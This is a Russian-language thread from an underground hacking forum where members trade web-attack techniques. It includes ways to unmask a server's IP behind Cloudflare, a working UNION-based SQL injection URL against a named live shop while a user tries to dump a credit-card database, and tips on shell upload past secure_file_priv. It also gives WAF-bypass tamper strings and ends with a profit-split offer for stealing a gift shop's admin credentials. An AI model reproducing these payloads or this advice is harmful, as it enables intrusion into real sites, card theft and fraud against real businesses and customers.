[web-hacking] Ваши вопросы

[Dark Koder]

На крупных (конкретно крупных а не топовых) я не встречал. И нормальные адекватные системщики ее не ставят. По одной причине - крайне неудобно для администратора работать, ошибки при обработке данных постоянно лезут, т.к. в особенностях строгое отношение к типам данных - и если юзер что то ввел не то\не так, ты ошибки компонентов из за разграничения прав зае*ешься разгребать. А если еще приплюсуем то, что "мало развиты и не широко применяются хранимые процедуры (пишутся на C, Java, COBOL и тд) " то для админа это вообще беда. Ибм нет смысла использовать, кроме как для тестов бородачей.
Один раз за все время встретили на головном серваке сетки отелей, сделать получилось как раз потому, что в связке с mysql (не потому, что они "не поумнели", а потому что на чистой работать самоубийство для сервиса). Про ТОПы и именно крупные (десятки миллионов юзеров етк) я вообще молчу. Это видно еще во время холодной войны сервис запускали =) И юзеры набрались за 50 лет, отсюда такие обьемы
Ваша статистика поэтому и применима, что вы ее получаете "из паблик дорков для sql-inj", что само по себе шлак, перебираете кучу шлака, ищете в тоннах песка золотую крупицу, там где первые старатели вымыли и выработали всю золотоносную жилу. Там как в говне копаться, причем в говне мамонта =) Если бы работали ТОЧЕЧНО, у вас бы была иная статистика =) Как раз если бы админы поумнели, они бы не ставили ибм. Это себе же западлить, тем более есть более современные разработки, не уступающие по секурности, от Ms. При этом более гибкие и приспособленные как раз под огромные обьемы данных, в т.ч. делающие ибм по скорости и удобству в разы. Ваша статистика в корне не верна, к сожалению (а точнее к счастью ).

возможно, но:

- про дорки - это чисто пример взял где первые попались. понятное дело, что они проработаны, так как паблик =)
- может статистика и не верна, но именно с точечных пентестов - треть именно дб2 (и не только с времен холодной войны). по остальным - mysql, maria-db, postgresql

по поводу строгости данных - это правильно делать так (а не давать юзеру вводить белиберду несусветную). если тип int - вводи цифры, а не емайл)))

 

[Desoxyn]

Dark Koder так именно в этом и проблема, что запретить юзеру что то вводить левое невозможно, юзер часто туп, и в графу DOB будет упорно пихать мыло, а потом психанет и заспамит поддержку, что сервис говно и невозможно зарегистрироваться. А эрроры сыпятся похлеще, чем в тех же mssql,mysql,maria,postgre etc + админу все попытки юзера разгребать тоже удовольствия не доставляет, а для ломщиков это ваще рай. Так что и тут можно поспорить, но предлагаю на этом обсужение преимуществ и недостатков ibm db закончить. Хотя и сам буду сталкиваться, уверен, но лучше обсуждать способы пробива, обхода, делиться словарями для брута и т.д. Тема больше для этого предназначена.

 

[Dark Koder]

Dark Koder так именно в этом и проблема, что запретить юзеру что то вводить левое невозможно, юзер часто туп, и в графу DOB будет упорно пихать мыло, а потом психанет и заспамит поддержку, что сервис говно и невозможно зарегистрироваться. А эрроры сыпятся похлеще, чем в тех же mssql,mysql,maria,postgre etc + админу все попытки юзера разгребать тоже удовольствия не доставляет, а для ломщиков это ваще рай. Так что и тут можно поспорить, но предлагаю на этом обсужение преимуществ и недостатков ibm db закончить. Хотя и сам буду сталкиваться, уверен, но лучше обсуждать способы пробива, обхода, делиться словарями для брута и т.д. Тема больше для этого предназначена.

разумеется, я с вами согласен =) (кроме спама техпода)

upd. попробовал локально и легально на дружественном сервисе побрутить колонки и таблички через скульмап. так вот, я не выяснил всех нюансов, но в ряде случаев при бруте просто выбьет все слова из словаря, так что пока что эффективность - 50%\50% =(

 

[Xrenovi4]

Подскажите как определить ip сервера за клаудом, поиск через историю не дал результатов

 

[Dark Koder]

Подскажите как определить ip сервера за клаудом, поиск через историю не дал результатов

ищи поддомены;
попробуйте послать курлом некорректный запрос с разными хедерами;
проверьте историю dns;
найдите незакрытую клаудом директорию

 

[Desoxyn]

Xrenovi4
так же:
shodan.io - hostname:
censys.io
viewdns.info/iphistory/
dnstrails.com
ptrarchive.com
crimeflare.org:82/cfs.html -тоже работает вполне =)
Чек на сабдомены и проверить так же их ipы
Получить письмо от сайта (зарегистрировавшись на нем скажем), часто в хидерах Recieved: ip отправителя бывает не за клаудом.
Если ипы которые найдешь, не резолвятся на домен, а выдают дефолтную сервера, или 404,403,etc - отсылай ипу заголовок host со своим доменом. Если вернет - ты нашел ип.
Вариантов много, но вот выцепить часто бывает очень сложно или не получится вообще =)

 

[m00r]

риг и остальные киты актуальны ли
и как называются правильно?:smile22:

 

[Dark Koder]

можете поделиться урлом на матчасть по командам Firebird и диалектам 2,3 ?

 

[drew]

Здравствуйте
нужна прога удаленного доступа типа тим вивер невидимая, покупал как то, потерял.

 

[Snam]

На sqli dumpere пытаюсь слить базку сс, столбцы есть, слива нет.. варианта два: 1_слобцы пустые; 2_кривые руки
Покрутите кто скуль:
https://www.templaco.com/html/product.asp?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23


(не пинайте.. я только учусь))

 

[Eject]

На sqli dumpere пытаюсь слить базку сс, столбцы есть, слива нет.. варианта два: 1_слобцы пустые; 2_кривые руки
Покрутите кто скуль:
https://www.templaco.com/html/product.asp?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23


(не пинайте.. я только учусь))

твой скульдумпер сломался

https://www.templaco.com/html/product.asp?id=999999.9%20union%20all%20select%201,(select+concat(group_concat(0x20,r,0x207c20,q,0x20+order+by+r+separator+0x3c62723e),0x01030307)from(select+cast(table_name+as+char)r,cast(ifnull(table_rows,0x30)as+char)q+from+information_schema.tables+where%20+table_schema=0x74656d706c61636f2d6c697665)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23

 

[Snam]

твой скульдумпер сломался

https://www.templaco.com/html/product.asp?id=999999.9%20union%20all%20select%201,(select+concat(group_concat(0x20,r,0x207c20,q,0x20+order+by+r+separator+0x3c62723e),0x01030307)from(select+cast(table_name+as+char)r,cast(ifnull(table_rows,0x30)as+char)q+from+information_schema.tables+where%20+table_schema=0x74656d706c61636f2d6c697665)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23

Что с ним не так??
Удалось слить?

 

[etc/passwd]

Что с ним не так??
Удалось слить?

Пустые столбцы

 

[hits]

вопрос по заливки шела через пма,имея рут,при заливке шела возможно ли обойти как то secure-file-priv?

 

[Desoxyn]

вопрос по заливки шела через пма,имея рут,при заливке шела возможно ли обойти как то secure-file-priv?

Если запрос
>> SELECT @@GLOBAL.secure_file_priv;
выдаст каталог, то сервер ограничивает операции импорта и экспорта только работой с файлами в этом каталоге. Каталог должен существовать; сервер не создаст его. Но этот каталог скорее всего так же не будет виден из веба, потому шелл для тебя там будет бесполезен.
Если выдаст значение NULL, сервер отключает операции импорта и экспорта вообще. Потому вероятно нет.

 

[Студент]

Здравствуйте. Подскажите, какие должны быть мои дальнейшие действия для того, чтобы получить логин и пароль админа.
При подставлении ординарной кавычки, получаю следующее:

Я правильно понимаю, это наличие sql инъекции?
Если да, то какими командами мне можно вывести данные администратора?
Пробовал делать по мануалу с соседнего форума (не знаю можно его тут упоминать или нет), ничего не получается.
К примеру при подставлении ' UNION SELECT 1 --
Получаю:

Подставлял ' GROUP BY 800 --
Пробовал числа до 800, всё равно ошибка не исчезает. При таком запросе если я правильно понял, ошибка должна пропасть, если полей меньше или равно 800

Как мне добиться результата? Только учусь

 

[pcalava]

Как мне добиться результата? Только учусь

Срабатывает WAF, ищи способы обхода, например так.

 

[Eject]

Mod_Security же, у sqlmap такие тамперы для мод сицурити:
1 AND 2>1-- > 1 /*!30874AND 2>1*/--
1 AND 2>1-- > 1 /*!00000AND 2>1*/--

 

[F0xman]

Здравствуйте. Подскажите, какие должны быть мои дальнейшие действия для того, чтобы получить логин и пароль админа.
При подставлении ординарной кавычки, получаю следующее:

Посмотреть вложение 3107

Я правильно понимаю, это наличие sql инъекции?
Если да, то какими командами мне можно вывести данные администратора?
Пробовал делать по мануалу с соседнего форума (не знаю можно его тут упоминать или нет), ничего не получается.
К примеру при подставлении ' UNION SELECT 1 --
Получаю:

Посмотреть вложение 3108

Подставлял ' GROUP BY 800 --
Пробовал числа до 800, всё равно ошибка не исчезает. При таком запросе если я правильно понял, ошибка должна пропасть, если полей меньше или равно 800

Как мне добиться результата? Только учусь

У меня идентичная проблема. Кто поможет достать логин с паролем админа, готов отдать 50% с реализации. Оплачу в тот же день. Шоп игровых гифтов. С прошлого аналогичного шопа достал 3к$ чистыми.

 

[Кузя]

У меня идентичная проблема. Кто поможет достать логин с паролем админа, готов отдать 50% с реализации. Оплачу в тот же день. Шоп игровых гифтов. С прошлого аналогичного шопа достал 3к$ чистыми.

пали линк)